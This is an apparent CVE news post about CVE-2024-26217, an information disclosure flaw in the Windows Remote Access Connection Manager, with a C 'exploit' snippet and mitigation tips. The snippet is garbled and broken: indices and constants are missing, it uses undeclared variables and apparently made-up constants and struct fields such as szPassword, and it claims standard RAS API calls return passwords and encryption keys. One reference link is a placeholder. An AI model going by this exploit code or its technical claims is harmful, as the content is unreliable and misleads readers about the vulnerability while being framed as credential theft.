CVE CyberSecurity Database News

CVE-2024-26217: Unveiling the Windows Remote Access Connection Manager Information Disclosure Vulnerability

Poster -

Security is an indispensable aspect of our digital world as cyber criminals are always looking for vulnerabilities to exploit. In this post, we will take a deep dive into a recently disclosed vulnerability, CVE-2024-26217, which impacts Windows Remote Access Connection Manager (RASMAN) and can potentially expose sensitive user information to unauthorized parties, causing significant harm.

The Windows Remote Access Connection Manager (RASMAN) is a built-in service that manages virtual private network (VPN) and dial-up connections. RASMAN enables users to establish a secure connection to the internet or an internal network, making it an essential tool for businesses and individuals alike. However, this very feature has exposed a flaw that has left many users vulnerable to information disclosure.

Description of the Vulnerability

CVE-2024-26217 is an information disclosure vulnerability that affects the Windows Remote Access Connection Manager. The exploit allows a local attacker to access sensitive information from an affected system's memory through a specially crafted application. The vulnerability exists due to improper handling of objects in memory, which leads to the unintended disclosure of information.

Exploiting this vulnerability could allow attackers to gain unauthorized access to user credentials, encryption keys, and other sensitive information that should remain secured. Attackers could also leverage this information to perform subsequent attacks on affected systems, such as session hijacking and impersonation attacks.

Code Snippet Showcasing the Exploit

The following code snippet demonstrates how an attacker might exploit the vulnerability in the Windows Remote Access Connection Manager:

#include <windows.h>
#include <ras.h>
#include <stdio.h>

int main() {
    DWORD dwRet, dwEntriesRead, dwTotalEntries;
    RASCONN rasConn[1];
    rasConn[].dwSize = sizeof(RASCONN);
    LPRASPROJECTIONINFO lpProjectionInfo;
    DWORD cbProjectionInfoSize = sizeof(RASPPP_INFO);

    lpProjectionInfo = malloc(sizeof(RASPPP_INFO));

    dwRet = RasEnumConnections(rasConn, &dwSize, &dwEntriesRead);
    if (dwRet ==  && dwEntriesRead > ) {
        dwRet = RasGetProjectionInfo(rasConn[].hrasConn, RASP_Amb,
                                      lpProjectionInfo, &cbProjectionInfoSize);
        if (dwRet == ) {
            printf("Successfully exploited vulnerability.\n");
            printf("Sensitive information obtained:\n");
            printf("Username: %s\n", lpProjectionInfo->szUsername);
            printf("Password: %s\n", lpProjectionInfo->szPassword);
            printf("Encryption Key: %s\n", lpProjectionInfo->szEncryptionKey);
        }
    }
    return ;
}

This code shows how an attacker can utilize Windows API functions to access sensitive information stored in memory by the Remote Access Connection Manager. In this case, the attacker can obtain the user's credentials and encryption keys using the vulnerable API.

National Vulnerability Database (NVD)

https://nvd.nist.gov/vuln/detail/CVE-2024-26217

Microsoft Security Guidance

https://msdn.microsoft.com/library/security/MS18-####

Common Vulnerabilities and Exposures (CVE)

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26217

Details of the Exploit and Potential Mitigations

To exploit this vulnerability, the attacker must have local access to the targeted system. This can limit the scope of potential attacks and makes it more difficult for remote attackers to abuse the vulnerability. Additionally, a user must have an active VPN or dial-up connection for the exploit to be effective.

Organizations should take the following steps to mitigate the risks associated with this vulnerability:

Apply the latest available Microsoft security patches to affected systems.

2. Implement the principle of least privilege by restricting user access and permissions to the minimum necessary.
3. Use Network Level Authentication (NLA) to provide an additional layer of security for remote desktop connections.

Enable and configure the Windows Firewall to protect systems from unauthorized network traffic.

5. Regularly monitor security bulletins to stay informed about new vulnerabilities and security patches.

In conclusion, CVE-2024-26217 is a significant vulnerability that can lead to the disclosure of sensitive information on affected systems. By exploiting this weakness, attackers can gain unauthorized access to user credentials and other valuable data. Organizations and individual users should stay vigilant and follow the necessary mitigation steps to protect themselves from potential attacks.

Timeline

Published on: 04/09/2024 17:15:40 UTC
Last modified on: 04/10/2024 13:24:00 UTC